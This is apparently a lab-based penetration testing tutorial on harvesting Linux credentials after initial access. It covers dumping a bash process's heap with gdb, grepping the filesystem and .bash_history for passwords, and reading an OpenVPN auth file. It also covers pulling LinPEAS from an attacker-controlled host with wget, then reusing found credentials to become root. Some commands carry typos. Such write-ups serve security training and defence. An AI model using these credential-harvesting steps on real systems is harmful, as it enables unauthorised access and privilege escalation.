Linux Password Mining — Extract Passwords from files and Memory Heaps

Bg Image: Daniel Chetroni/Shutterstock

Password Mining

As already explained in the Windows Password Mining article, Password Mining is the process of enumerating and extracting encrypted or plain-text passwords in persistent or volatile memory on the target system. While the method varies from Linux distribution to distribution, it’s crucial to have a fundamental understanding of where and how Linux stores passwords (both encrypted or clear-text). The approach heavily depends on a number of flaws in an organization’s or user’s password security procedures.

Password Security Policies are used to establish a baseline security level for user passwords and enforce the secure storage and usage which usually comprises of words, numbers, symbols and of a minimum length of 8 characters.

Because employees/users would rather rely on one “safe” complex password than to produce a new one for each account, this leads to the use of the same password for many accounts. For convenience of access, people who are obliged by company regulations to use separate passwords for several accounts are more likely to save the numerous passwords on their systems in clear-text in .doc, .txt, and .xlsx files.

Linux encrypts and stores user passwords locally; following a first penetration, user account hashes can be retrieved from memory and cracked, depending on how weak the password is. Furthermore, Linux is frequently used to host a variety of third-party business-critical applications, and these applications frequently require user access management and are vulnerable to password mining attacks because they frequently store clear text passwords in their configuration files on the server.

Prequisites:

• Debian virtual machine as my Target box
• Kali Linux as my attack box

- Familiar with various Linux shell commands

You will require initial foothold on the system. Here, I’m authenticating to the target via SSH as a standard user with no privileges.

standard bash shell

Extracting passwords from memory

We start by investigating a novel technique that depends on the target’s application type and deployment use case. Applications that use username and password authentication are permitted to keep the credentials in user-space memory (either in clear-text or encrypted). Such an application’s memory dump and analysis could turn up credentials that are relevant to it. The credentials can be used to access the service or take control of it. Since many users and administrators are prone to reuse passwords for other accounts and applications, we can also utilize the detected credentials to authenticate in other places.

To obtain clear-text or encrypted passwords, we can use the GNU Debugger (GDB) to dump the memory of a running service or application.

GDB is a portable debugger that runs on various Unix-like systems and can be used to debug various programming languages.

This technique would vary from system to sytem due to the type of application we are interacting with.

1. Finding services that are currently operating and need authentication or that may have already authenticated with other services on the target system is the first step.This can be done by running the command:

ps -ef

This displays a list of all currently active services on the target along with their associated Process Identifiers (PID). We can recognize a number of services operating as “user” in the image below. Let’s examine Bash, which is the currently active terminal..

If you have specific service in mind you would like to look up, you can manually do that by combining the grep command to limit the ‘ps’ command output to a specified term. Use command:

ps -eg | grep '<SERVICE_NAME>'

2. After identifying the bash service, let’s use the GDB tool to dump its memory in order to discover any credentials that the user may have previously entered. Use command:

gdb -p <PID>

This command is used to specify the PID of the service you want to analyze. Fom our screenshot above, Bash is runnig with a PID of 3839.

It launches you into a gdb interactive shell where subsequent commands would be entered.

3. Now we list all mapped memory regions for the process. Use GDB command:

info proc mappings

Take note of the Start Address and End Address of the Heap as selected in the screenshot.

4. We can now dump the memory of the service by specifying the start and end address of the heap allocation. Use GDB command:

dump memory <OUTPUT_FILE> <START_ADDRESS> <END_ADDRESS>

This will output the contents of the heap memory of the Bash service into a file for us to analyze. Press q to quite the debugger.

The Heap is a dynamic memory used by applications to store global variables.

5. After dumping the heap into a file, we can use the strings utility to identify potentially useful information such as credentials. Use command:

strings <OUTPUT_FILE> | grep passw

This command will identify all strings in the output file and find any occurrence of the passw keyword.

We are able to identify an authentication to the MySQL server with the username and password in clear-text.

However, the target isn’t running MySQL per Nmap scan results.

Nmap scan results

6. Alternatively, we can utilize the MySQL credentials to try and gain access via ssh since users are prone to re-suing same credentials everywhere. I’m going to try to SSH into the target with this newly discovered creds.

ssh root@<TARGET-IP>

We’ve now been able to dump and analyze the memory of an active service. This was due to:

• Password reuse by the administrator or root user.

• The MySQL authentication command included the username and the password.

When analyzing the heap output file, don’t limit your string search to ‘passw’ only, you can search for FTP, SSH, su, nano, cat, vim etc commands to see any sensitive info in these commands the user might have entered in the command line.

Searching for passwords in configuration files

Applications give attackers a wide range of options because their flaws and vulnerabilities, as well as the storage of their credentials, can result in total system compromise or privilege escalation. The method shown here changes depending on the application and on the kind of target you are dealing with. The first phase entails looking locally for passwords. Meaning that we will locate any text files or configuration files that contain user or application passwords.Searching for passwords

• We start off by finding files that contain passwords. This can be done by leveraging the grep utility.

grep --color=auto -rnw '/' -ie "Password" --color=always 2>/dev/null

— color will color code the results accordingly

-rnw means recursive search, print line number, match only whole words

‘/’ means start search from root directory

-ie means ignore case, and use patterns for matching.

This produces a large output so you can always redirect the search results to an output file to analyze later.

It is recommended to try out other keywords such as passwd, pass, passw, key, secret, etc. This is because configuration files store passwords under different names and may use abbreviated forms of the word.

• Since the search run through from the root directory, the output was massive and a bit overwhelming. We can limit the search to certain interesting locations on the Linux partition. Let’s take a look at the /etc directory.

grep --color=auto -rnw '/etc' -ie "Password" --color=always 2>/dev/null

• We weren’t able to find any useful credential in this location so we therefore turn our attention to the user account home directory.

grep --color=auto -rnw '/home/user' -ie "Password" --color=always 2>/dev/null

In a myvpn.ovpn, there’s a line which says the auth-user-pass credential is stored in a file located in /etc/openvpn/auth.txt

cat /etc/openvpn/auth.txt

The output revealed the credentials of the currently logged on user. If we didn’t know the credentials of the user beforehand, this info would have been useful.

• We can utilize the find command in conjunction with the grep utility in order to fine-tune our searches based on configs of the target.

find /etc -type f -exec grep -i -I "pass" {} /dev/null \;

This will output a list of files that contain the ‘pass’ keyword. In this case we couldn’t find any file that contained any credential we can use.

• We can search for files in the user home directory that contain the keyword “pass”

find '/home/user' -type f -exec grep -i -I "pass" {} /dev/null \;

We identify the Internet Relay Chat(IRC) client configuration file that contain the user credentials.

We can automate this process through the use of the Linux Privilege Escalation Awesome Script (LinPEAS). The LinPEAS binary can be downloaded here. After downloading, transfer it to your target.

This can be done by setting up a python web server in the directory where LinPEAS has been downloaded to.

pythom -m SimpleHTTPServer

Now that the binary is served, use the wget utility to download it to the target machine.

wget http://<ATTACKER-IP>:8000/linpeas.sh

Now give the script executable permissions before running it. Use command:

chmod +x linpeas.sh

You’ll see a change in color of the linpeas binary the next time you ls

We can now run the script with the command ./linpeas.sh

In the results, we can see it detected the openvpn auth.txt file which contains the standard user credentials.

Searching for passwords in history files

Unless otherwise specified, Linux would by default record every bash command a user entered on a system. The system administrator will benefit from being able to examine all user actions and commands using this history of commands as a foundation. Attackers may use this, if configured incorrectly, to look for sensitive data, such as credentials from earlier Linux commands kept in other history files.

• First step involves analyzing the user account Bash history file.

cat /home/user/.bash_history | grep "pass"

We are able to see a MySQL command used by the user sometime in the past.

NB: The .bash_history file only stores the history of a specific user. It doesn’t store the history of ALL users on the system. The history file can be configured in the .bashrc file also stored in the home folder of the user.

Since no MySQL server seems to be running on the target, let’s utilize the switch user command to switch to the root account with our newly discovered credentials.

su root

Alternatively, we can also use the history command to see all commands entered in the terminal.

We have been able to successfully searched for and identified locally stored credentials which we used to elevate our privileges. Check out my Windows Password Mining article here

I got most of the knowledge from this post by purchasing and reading Hackersploit’s Privilege Escalation Techniques book. You can purchase it from his website or by clicking here. If you have any questions you can DM me on Twitter @tinopreter.